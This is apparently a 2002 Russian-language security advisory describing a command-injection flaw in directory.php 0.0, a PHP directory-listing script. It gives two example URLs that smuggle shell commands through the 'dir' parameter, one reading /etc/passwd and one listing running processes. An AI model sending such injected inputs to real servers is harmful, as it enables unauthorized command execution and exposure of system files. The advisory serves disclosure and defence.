Выполнение произвольных команд в directory.php

Дата публикации:
15.03.2002
Всего просмотров:
711
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Сценарий directory.php обеспечивает Web интерфейс для просмотра каталога, подобно 'ls' команде. Проблема, существующая в этом сценарии, позволяет пользователю выполнять произвольные команды оболочки. Это достигается включением метасимволов типа ; или | во вводе сценария. Команды оболочки выполнятся с разрешениями процесса сценария.

Уязвимость найдена в Marcus S. Xenakis directory.php 0.0

Пример:

1. Просмотр файла паролей:

http://www.vulnerableserver.com/directory.php?dir=%3Bmore%20/etc/passwd

2. Просмотр всех запущенных процессов:

http://www.vulnerableserver.com/directory.php?dir=%3Bps+-aux

Ссылки: Источник

или введите имя

CAPTCHA